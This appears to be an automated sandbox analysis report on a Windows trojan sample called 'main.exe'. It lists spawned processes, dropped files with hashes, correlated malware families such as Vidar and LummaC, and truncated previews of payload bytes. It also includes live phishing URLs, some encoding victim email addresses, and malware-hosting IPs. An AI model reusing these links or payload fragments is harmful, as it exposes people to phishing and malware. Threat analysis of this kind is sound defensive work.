Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	main.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@40/42@2/2
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 61% Number of executed functions: 43 Number of non-executed functions: 147
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.190.181.6, 13.107.246.63, 172.202.163.200
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7460 because it is empty
Execution Graph export aborted for target svchost.exe, PID 8164 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:29:12	API Interceptor	28x Sleep call for process: powershell.exe modified
03:29:28	API Interceptor	1x Sleep call for process: downloaded_exe.exe modified
03:29:33	API Interceptor	1x Sleep call for process: Flux.com modified
03:30:09	API Interceptor	1x Sleep call for process: WerFault.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
KRYSTALGR	https://go.skimresources.com/?id=129857X1500501&url=https://www.freelansssssssssssssssscer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/45834840-3c14-4374-8f51-bbcadebab762?j=eyJ1IjoiNGRnZ2x2In0	Get hash	malicious	HTMLPhisher	Browse	185.199.220.80
	http://www.artisteer.com/?p=affr&redirect_url=https://tdg.site4clientdemo.com/vendor/bin/hereme/43432/6467r/biddept@lakeshorelearning.com	Get hash	malicious	HTMLPhisher	Browse	185.199.220.80
	https://pub-8ffae7e163d64ee9b90d8cfcccbd4d95.r2.dev/autoloadmicrosoft.html	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	185.199.220.62
	5CxmQXL0LD.exe	Get hash	malicious	SystemBC	Browse	185.199.220.75
	https://garfield-smith-technology-data-lawyers.mailchimpsites.com/manage/preferences?u=c1a66125f053aaa6f385b82e8&id=ac8e522263&e=f9e7e3ef3c&c=e6272aed0a	Get hash	malicious	Unknown	Browse	77.72.1.45
	https://www.aspcp.uk	Get hash	malicious	Unknown	Browse	185.199.220.70
	http://belle-group.at	Get hash	malicious	Unknown	Browse	185.199.220.93
	https://googleweblight.com/i?u=https://hizoom.co.uk/wp-admin/js/hereme/46343/8473r/YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=&domain=iledefrance.fr	Get hash	malicious	HTMLPhisher	Browse	185.199.220.80
	https://hizoom.co.uk/wp-admin/js/hereme/46343/8473r/YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=	Get hash	malicious	HTMLPhisher	Browse	185.199.220.80
	https://avisfordparkhotel.com/	Get hash	malicious	Unknown	Browse	185.53.58.58
INF-NET-ASRU	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	89.169.180.216
	Space.mpsl.elf	Get hash	malicious	Mirai	Browse	89.169.4.44
	Space.ppc.elf	Get hash	malicious	Mirai	Browse	89.169.4.44
	Space.arm7.elf	Get hash	malicious	Mirai	Browse	89.169.4.44
	Space.i686.elf	Get hash	malicious	Mirai	Browse	89.169.4.44
	Space.m68k.elf	Get hash	malicious	Mirai	Browse	89.169.4.44
	Space.spc.elf	Get hash	malicious	Mirai	Browse	89.169.4.44
	Space.x86_64.elf	Get hash	malicious	Mirai	Browse	89.169.4.44
	Space.mips.elf	Get hash	malicious	Mirai	Browse	89.169.4.44
	Space.x86.elf	Get hash	malicious	Mirai	Browse	89.169.4.44

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	iviewers.dll	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	185.199.220.71
	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	185.199.220.71
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	185.199.220.71
	pM3fQBuTLy.exe	Get hash	malicious	Vidar	Browse	185.199.220.71
	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	185.199.220.71
	Brooming.vbs	Get hash	malicious	Remcos, GuLoader	Browse	185.199.220.71
	TT copy.js	Get hash	malicious	FormBook	Browse	185.199.220.71
	TUp6f2knn2.exe	Get hash	malicious	LummaC	Browse	185.199.220.71
	QIo3SytSZA.exe	Get hash	malicious	Vidar	Browse	185.199.220.71
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	185.199.220.71

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\542181\Flux.com	pM3fQBuTLy.exe	Get hash	malicious	Vidar	Browse
	QIo3SytSZA.exe	Get hash	malicious	Vidar	Browse
	'Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	CapCut_12.0.4_Installer.exe	Get hash	malicious	LummaC Stealer	Browse
	CapCut_12.0.4_Installer.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.msi	Get hash	malicious	Vidar	Browse
	69633f.msi	Get hash	malicious	Vidar	Browse
	fm2r286nqT.exe	Get hash	malicious	LummaC	Browse
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse
	lem.exe	Get hash	malicious	Vidar	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_0915295c-7186-43ad-979c-cf487fb50f12\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.660355734942067
Encrypted:	false
SSDEEP:	96:3WNFK3egqigKJ6ts3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2ZAX/S:acHHn4xR0apYKjqzuiF3Z24lO8JO
MD5:	8D805169D6D45E5F404313C2CA9D15E0
SHA1:	67CF916A773CE0BA6AD5A713B68721452DE4DC2F
SHA-256:	D214FFDF593561B7A8E7C1BC7D3450313FE3C0A5D1296FA9C6F55EDE15142088
SHA-512:	2905FABC985ED5A21FEFFE6689E52DDCFA473C0B528B8F51F320F4D4B1A28B1379070A538B1FCDB59500810B3CF785F3633D922720753D33D81945C834605569
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.7.0.6.0.4.8.2.7.1.4.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.7.0.6.0.5.1.7.0.9.1.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.1.5.2.9.5.c.-.7.1.8.6.-.4.3.a.d.-.9.7.9.c.-.c.f.4.8.7.f.b.5.0.f.1.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.7.d.f.9.9.d.-.e.e.0.5.-.4.8.7.4.-.a.f.c.1.-.4.3.4.3.0.7.0.4.c.0.2.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.8.-.0.0.0.1.-.0.0.1.4.-.2.e.8.6.-.5.b.3.2.f.0.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.e.f.b.3.f.9.7.3.4.2.b.a.1.9.5.4.2.4.1.3.4.f.2.8.f.9.7.7.d.a.9.e.0.d.6.a.a.9.1.!.f.o.n.t.d.r.v.h.o.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDEF.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Dec 19 08:30:04 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	48038
Entropy (8bit):	1.2583902195801664
Encrypted:	false
SSDEEP:	96:5O8RtpiS0REZeyMNr7i7uBkz9Umb1/6qCWI3rIgSh:r7VSpOCkzqe19gSh
MD5:	7AA66F3388A728F5EDFE188D46685DBA
SHA1:	C6D928C0DDB0276DCD9E9D0C8F27661D35FD1F8C
SHA-256:	3E7B7BBF2EDE75C3899A7D55A963B6E988C3FACD4B961A88C7E5F27EB8F53620
SHA-512:	04751687D6CFB262D5A420612B07A8F6DC73D3975B122AA41AFAC593DE11003AC4F9FAFD8DB0AB521CAFE2FCBB347AFD012E1CDD6A6DEACE3F50FE6ED464628B
Malicious:	false
Preview:	MDMP..a..... .........cg........................................2!..........T.......8...........T.......................................................................................................................eJ..............Lw......................T.............cg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8620
Entropy (8bit):	3.693124804467733
Encrypted:	false
SSDEEP:	192:R6l7wVeJXMay6YKGiKgmfr57vHYpDl89bi3TfX2m:R6lXJc/6YriKgmfrFvHPiDfv
MD5:	9651B4FA3013163EDC249E76630BFCC6
SHA1:	554585B36EEA8B66B374D6D04F7DE7A0BF0E94A1
SHA-256:	F4CC92B0EA7CB781DF809BBC15C177A7B1846E613CF1FA12ADAF2D9C2D737BD1
SHA-512:	14706CC4C741C162A5F1FC955F730EFFE7C507D547BB68AFE08A65F03BED57FCDE8DCE49A50A2553ACA572F99B7E1A4B08A73CB651E2CAE114410D8C9044A231
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE5F.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4853
Entropy (8bit):	4.443116607140183
Encrypted:	false
SSDEEP:	48:cvIwWl8zstJg771I9HcWpW8VYk5wAoYm8M4Jk5LvM6FTryq8vU5LvMYaMuMFd:uIjfHI7kV7VXTFJcjMAWsjMY1u2d
MD5:	1C35F9DABF6064B65277D9AA42B0D575
SHA1:	FFD9A0F364B51CE011ABACA8ADD1F569787A27B2
SHA-256:	B3EC78C74043FE614D86A9F1DD40E87DA796CBA84149AF401C259921AF308BC9
SHA-512:	00F6F27BB5B5375E2ACE453C0D4306448DC7FD5A35BE3E2432BFBF3555FB2F6913019257AD31571B91DAAA5CC8B209EF0875847342B8024E78E1269DD1B61047
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="637892" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ping[1].php

Download File

Process:	C:\Users\user\Desktop\main.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1735416
Entropy (8bit):	5.992605444519626
Encrypted:	false
SSDEEP:	24576:5dGc84aalD0Vc7JlMd9U1/pGY5W6ZVhuIPyGB5OkqOreAU4HSd/Z3YG6gPxo4ZCI:5Tno92GQvuIZRfobW1I
MD5:	5DA661176D59BCDCA53728ABCC59E36E
SHA1:	FD08BB31AB7A5022A6D9B88F1A158B9BCD5C06B3
SHA-256:	49E2EE5A0309F25AC8D991F899DAEF585E125C2B95D9B04D55B9CD7E7EEF4978
SHA-512:	B522A6D161E2B4F486C28EBFF7828A6C6B873335034DD121EDCCE47A71949BA7B678C4CAAAEBC60479E6DAE8914C70F2910791511344BF072CDD6B0A6CC0F1D3
Malicious:	false
Preview:	TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABBe9FrBRq/OAUavzgFGr84DGI8OAYavzgMYiw4FBq/OAUavjipGr84HocVOAkavzgehyU4BBq/OB6HIjgEGr84UmljaAUavzgAAAAAAAAAAFBFAABMAQYA5OJHTwAAAAAAAAAA4AACAQsBCgAAdAAAAPYHAABCAACvOAAAABAAAACQAAAAAEAAABAAAAACAAAFAAAABgAAAAUAAAAAAAAAAKAQAAAEAACHqBMAAgBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAQKwAALQAAAAAABAAAoUAAAAAAAAAAAAAUqITAOg5AAAAYAgAlAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACQAADQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAACMcgAAABAAAAB0AAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAbisAAACQAAAALAAAAHgAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAJwrBwAAwAAAAAIAAACkAAAAAAAAAAAAAAAAAABAAADALm5kYXRhAAAAEAgAAPAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAwC5yc3JjAAAAAoUAAAAAEAAAhgAAAKYAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAANYPAAAAkBAAABAAAAA0AQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\542181\Flux.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: pM3fQBuTLy.exe, Detection: malicious, Browse Filename: QIo3SytSZA.exe, Detection: malicious, Browse Filename: 'Setup.exe, Detection: malicious, Browse Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse Filename: Setup.msi, Detection: malicious, Browse Filename: 69633f.msi, Detection: malicious, Browse Filename: fm2r286nqT.exe, Detection: malicious, Browse Filename: nB52P46OJD.exe, Detection: malicious, Browse Filename: lem.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\542181\b

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	687996
Entropy (8bit):	7.9997719449066205
Encrypted:	true
SSDEEP:	12288:dh1aYSV+WltXIrck3QPjUO7LuotG2q3iONh7W8N2kYaVOUHl/cB:d2ZXw3sU4uotG2qSOr7W5kNVOoG
MD5:	0CD5D115C1D61F18D93676CAC7C97E79
SHA1:	BE9AF7AD36E20D92ADF906DDAA6378464D4BA716
SHA-256:	A3E3F87C9D58317B226F10ED8ED4A68C94CBA5034FC2E3F97DB4938EBEADECDC
SHA-512:	25D5892B2222A5542DF72929276D594A7BC795DA08075B99CFA136A8E6BB2A5DD7CAED23DF79A0D1BE7FEF29E35053ADF4E400057FFF0DC1403872C45CFF6C9D
Malicious:	false
Preview:	....l.@......>...<...x<..Y,.!@...y].W..Y..B\.\|...F5.[.....f......KfL...9.#J..?%.`=...8...j...l.]0..hEk.<bM..@.q...;...IQ[_o..jme..S..~\|...q...)..7.~\...J...F.H..L...hqg.<5[rd5...q....G...p. ..FZ).Rp9........%er.\|.vJ$@.......;X9.......p......(...lf.L....c3..I~.....h...&.f.....:..0.$....A....O.l..u...........SQ{.QP.l.o.....K...........,1....c;K...`....#..8.YV...c.NE.@...x]...0....w.l-.0........O1..vw.e.H....h........2+.......1?.q....;.6.@y..x.7...CL..-~..P.7..%.N.'........5>..8=..$...iKhVV.AW.R...9.H..c..Q7o~.....T#.m..,1.q...... t[GH8......H\|.P.............wt..........\|.E&....+8.8"..rF.I.r.S.).8.....W.C..E.K<C.......?"2...?1..t.`.I..f./J.t\6.+B.-.3..N<....g^...\|r./..iY........n$G.,#\|Rz.{+.E...Z]$5.A$....F..W[..:c..Y.....=.L...A..\.",Q.\...#.M.....-.]..H.......W@.^G...in...j...V>.@..RL.L.O......K...i.-....T............K.Y.vYM5..L..E.H^.r....?.v..n(.?..M.bc.x.....p..U.u.T ...H9.d..Q..H.....i09{?.....9.J.Y,.\|c>?.c..T..#Y3.h[#.F.,&..g.

C:\Users\user\AppData\Local\Temp\Acne

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	141312
Entropy (8bit):	6.419271195343598
Encrypted:	false
SSDEEP:	3072:tg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mO:+5vPeDkjGgQaE/loUDtf0j
MD5:	7730C06D95CAB2EA3647E80227548C28
SHA1:	14484BE27F5A3D45D93FE3D593E23152915A2D8D
SHA-256:	D13033BBDEE6E2603702E2D9F55B79C7AB5F04153A1B54E5B30E24AE98637868
SHA-512:	8B6CEE897A73EC0B3FEE27E5343CD13983ECE6EAC00FC667968B9E468550B6973971C64FC5BD8047E492A924BDC57D3BEE59056F08B5ACCD6CA214ED27D38FE1
Malicious:	false
Preview:	3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.\|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....\|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h....V.U...YY_..^[...U...u...(M......U...t...@)M.......y..u&...)M...u...M.........Qj..u...x.I.].....)M...U...u...(M..H.....@)M.......q.P.....j..u.j..u...x.I.]...U..M....t.W.}.........._]...V..4.I...(M.P..........t...@)M...j.....0.....^...U....SVW.}..E.P..7....I..E.l....E...p....E.PV

C:\Users\user\AppData\Local\Temp\Billion

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	21058
Entropy (8bit):	7.313254413465614
Encrypted:	false
SSDEEP:	384:4HwWV8tnwmTihbn929MwO/ChZrzmZGhLdXVaeCVrVEVFJ8ZcGwGBk7/UMQ3rw:4ByLiFuO/ChgZ45VatJVEV3GPkjF
MD5:	8AA94191055FBB67A906295C4D550307
SHA1:	74DB3AF9A032AE930A2A066DDE7916BA01D6DB0E
SHA-256:	C20E6367401DF27FFB20CFF2AA8CB431E5A46F97C5C308453CFDB4630E7439EE
SHA-512:	E2C2CC5AA16B3401858D1800C4533E91ABFFAF4028936287777679E7147FC29BAF0320C13A7E1F2FD388F4BE6B854261D290BDE40AEA7B524147333AB5F5E3EF
Malicious:	false
Preview:	.3.3.3.3.3.3.5.5.6.6.6.6.:.:$;{;.;.;.<$<V<b<r<.<.<.<.<.<.<.<.<.<.='=1=>=v=\|=5>.>...........0.0R1{1.1.1.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3-3Y3a3l3.3.3.4,4.4.4.4.4.4.4.4.4`5.5.5.6i6.6;7z7.7.7.989F9V9b9.:.;.;.;.=4=H=.>.>.?.?~?.?...........0.0=0v0.0.0.0.0.0.1.3.3;4D4N4T4Y4d4i4q4.4.5N5_5.5.5.5.5.6.686Z6l6.6.6.6.6.6C7w7.7.7.7.8.8+828a8.8.8.8.8.8.8.8.9$939:9P9x9.9.9.9.9.9":7:b:n:}:.:.:.:.:.:.:.:.;.;.;.<.<.<8<B<X<^<.<1=J=w=.=.=.=.=.=.=.=.>M>T>c>n>.>.>.?e?l?.?.?.?.?.?.?... .......0\0.0.0.0.1.1)1=1D1[1b1h1.1.1.1.1.1.1.1.1.1.1B2d2.3.3)313b3}3-4L4.4.435^5.5.5.5.696d6.6.6.6"7>7s7.7.7.7.8:8o8.8.8.8.8.8.9P9.9.9.9.9.9.9.:.:/:I:c:}:.:.:.;.;.;.;.<9<n<\|<.<.=.=.=.=%>A>.>.>.?.?.?T?v?.?.?.0......O0.0.1i1.1.2.2.2:3P3.3.4.5I5[5y5.5/6\6.6.6.6.7%7,737H7q7.7.7!8.8.8.92999L9.9.9.:.:@;Q;.;.;.<(<.<.<.<.=B=q=.=.=.>.>.>.>.?_?.?.?...@......}0.0R1.1.1.1.1y2.2.3.3.3.3^4.4.4.4.4.4{5.5"6p6.6.6.6.6~7.7.7.7.8.8(8;8D8W8.8.8.8.8.9.9.91:.:.;"<.<.<.<.=@=.=.>.>.>U?.?...P.......0C0n0.0.0.0.1E1U1h1.1.1+232:2B2.2*3G3.3.3.3G4Q4y4

C:\Users\user\AppData\Local\Temp\Catholic

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	7.997846639803936
Encrypted:	true
SSDEEP:	1536:iC9GRgkIP4GvlQxu1VYlMMNq+B/jf7KPqHgayJLzz+9oURr3S+cU0YZBR4jnF:iC9GRgkIQIOq+Fb7K0g1C9oyC+cWZBKp
MD5:	F3DE968CF1588615C1DAAC259FD6A5E4
SHA1:	21C9A43DBCDC552F7CD1E7A05E16A560575329D9
SHA-256:	A8EFF2FC3CA4BC0ADDD04E422BFC72B032CF38B5B0805E30BACFB1D4CE9108FC
SHA-512:	0CDCCA10BF20B9FD26A73DFFE555AA1468651785447DF0A87513ED34AE48B79982DE4E312DF0C00880BAA3769D7FB6223CCC496FF53E0F670CDBA5EA78D5B3D8
Malicious:	false
Preview:	E.H?..q....r..Nq.)9..2G....t.~MWe[},.u..`.=.....-.k.4].'..../X..r....}.r/cM..!Twe..@=.dB.......L.,.:n.....:xh)....T.......iV...d.g....h.Q...J.a..6tc.(..[$....1..$.=.y.9.[..g9..&,..\|..#`IB.......<24...c.....{..bm[a.~...{..~..:.&f~.....\|.j.(ZW..Z&.A[...@]..IT..-.........$...>;je..W..A.!....Q..VWo...n4^..k.....(m&..C5.e....u(.v.....Z....n...i...\|w..Y.d.o.N.W..%,......-X.4..Ru.....C.u.....c..cbj.x..BIg`jir..\|)..........}.^uc..{7ba.......:.h-Lh\.09a6..}..-...G.kD...3..y;s3.vC.....y.?.D.zX@...V[..i..P.........8bfF.qe....{~2..cV!.X..1&.._......7.$.tq~....e..d..-.$...\9.=.Z......z~...+.B[.T.~xA.l.JX...5.?..]jA...F..h.?W...4..8.lD-...=;.....!U4.......~..g/..V.,.^xX.x.. .I..$...P...t._.8x.3jh..V...Z.cx.c...1)..5..K..>.#.Bl.N.~.-.,.m,SW..T......_.....m.1......w2..X..x[..@@O.....M.J.0.>.$R...};@.Ng....i.}.S..=....,x.%..d.4..O......;...Y..].z.O8D..;.Q...t.......J....R..1..,.%..b-%.x.:.T.\|<...v..E.6H.....7.RD.....,.wI1..G.6.....!.....x,.

C:\Users\user\AppData\Local\Temp\Del

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	COM executable for DOS
Category:	dropped
Size (bytes):	64512
